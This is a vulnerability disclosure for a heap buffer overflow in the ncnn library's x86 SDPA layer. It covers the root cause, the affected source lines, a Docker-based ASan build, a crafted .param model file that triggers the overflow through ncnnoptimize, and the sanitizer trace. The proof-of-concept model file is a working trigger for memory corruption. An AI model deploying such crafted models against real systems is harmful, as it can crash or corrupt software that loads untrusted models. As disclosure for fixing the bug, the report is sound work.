Heap Buffer Overflow in SDPA KV-Cache Outputs
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/sdpa_x86.cpp:342 in SDPA_x86::forward
Sanitizer verdict: heap-buffer-overflow
Summary
A .param model that declares an SDPA layer with 7=1 (kv_cache) but only one output blob makes the x86 SDPA implementation assign two ncnn::Mat objects past the end of the top_blobs vector, which ncnn sized from the layer's declared output count. The first out-of-range assignment invokes Mat::operator=, whose release() dereferences a refcount pointer read from heap memory 8 bytes beyond the allocation — an uncontrolled decrement and potential free() of whatever that adjacent memory holds. The entry point is ncnnoptimize, which loads the attacker's parameter file and runs ModelWriter::shape_inference(); any Net::forward over the same model reaches it identically.
Detail
SDPA::load_param takes kv_cache = pd.get(7, 0); from the parameter file and never cross-checks it against the layer's declared blob counts. The runtime sizes the output vector purely from the graph text:
// src/net.cpp:855
std::vector<Mat> top_blobs(layer->tops.size());
int ret = layer->forward(bottom_blobs, top_blobs, opt);
// src/layer/x86/sdpa_x86.cpp:340
if (kv_cache)
{
top_blobs[1] = key;
top_blobs[2] = value;
}
The forward implementation only ever writes top_blobs[0] explicitly (Mat& top_blob = top_blobs[0];), then unconditionally appends the two cache tensors when kv_cache is set. Nothing in load_param, in Net::load_param, or at the top of forward requires tops.size() == 3 in that configuration, so a model that declares SDPA sdpa 5 1 ... 7=1 — five inputs, one output — is accepted.
With one declared top the vector holds a single 88-byte ncnn::Mat. top_blobs[1] addresses byte 88, one element past the end. Mat::operator= at src/mat.h:1551 calls release() on the destination before overwriting it, and release() starts with if (refcount && NCNN_XADD(refcount, -1) == 1), loading the 8-byte refcount field at offset 8 of that out-of-range element — address 96, the "8 bytes after 88-byte region" in the ASan report. In an unsanitized process this reads whatever heap data follows the vector as a pointer and, if it is non-null, atomically decrements through it and may call fastFree() on the adjacent data field; top_blobs[2] = value then repeats the pattern 88 bytes further out.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-sdpa-kv-cache-outputs && cd ncnn-poc-heap-buffer-overflow-in-sdpa-kv-cache-outputs
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'EOF'
7767517
6 6
Input query 0 1 query 0=1
Input cur_key 0 1 cur_key 0=1
Input cur_value 0 1 cur_value 0=1
Input past_key 0 1 past_key 0=1
Input past_value 0 1 past_value 0=1
SDPA sdpa 5 1 query cur_key cur_value past_key past_value output 7=1
EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x508000000480 at pc 0x64528380bf3b bp 0x7ffcf9814bd0 sp 0x7ffcf9814bc0
READ of size 8 at 0x508000000480 thread T0
#0 0x64528380bf3a in ncnn::Mat::release() /ncnn/src/mat.h:1583
#1 0x64528380bf3a in ncnn::Mat::operator=(ncnn::Mat const&) /ncnn/src/mat.h:1551
#2 0x64528380bf3a in ncnn::SDPA_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/sdpa_x86_avx512.cpp:342
#3 0x64527a93370b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
#4 0x64527a91bb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#5 0x64527a97b9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#6 0x64527a80d3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#7 0x64527a88aeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#8 0x747df95411c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x747df954128a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#10 0x64527a80a624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x508000000480 is located 8 bytes after 88-byte region [0x508000000420,0x508000000478)
allocated by thread T0 here:
#0 0x747df9bbc548 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:95
#1 0x64527a89ba99 in std::__new_allocator<ncnn::Mat>::allocate(unsigned long, void const*) /usr/include/c++/13/bits/new_allocator.h:151
#2 0x64527a897522 in std::allocator_traits<std::allocator<ncnn::Mat> >::allocate(std::allocator<ncnn::Mat>&, unsigned long) /usr/include/c++/13/bits/alloc_traits.h:482
#3 0x64527a897522 in std::_Vector_base<ncnn::Mat, std::allocator<ncnn::Mat> >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:381
#4 0x64527a9891be in std::_Vector_base<ncnn::Mat, std::allocator<ncnn::Mat> >::_M_create_storage(unsigned long) /usr/include/c++/13/bits/stl_vector.h:398
#5 0x64527a985bd4 in std::_Vector_base<ncnn::Mat, std::allocator<ncnn::Mat> >::_Vector_base(unsigned long, std::allocator<ncnn::Mat> const&) /usr/include/c++/13/bits/stl_vector.h:335
#6 0x64527a9841a0 in std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >::vector(unsigned long, std::allocator<ncnn::Mat> const&) /usr/include/c++/13/bits/stl_vector.h:557
#7 0x64527a933670 in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:855
#8 0x64527a91bb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#9 0x64527a97b9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#10 0x64527a80d3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#11 0x64527a88aeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#12 0x747df95411c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#13 0x747df954128a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#14 0x64527a80a624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/mat.h:1583 in ncnn::Mat::release()
Credit
Zheng Yu @ DepthFirst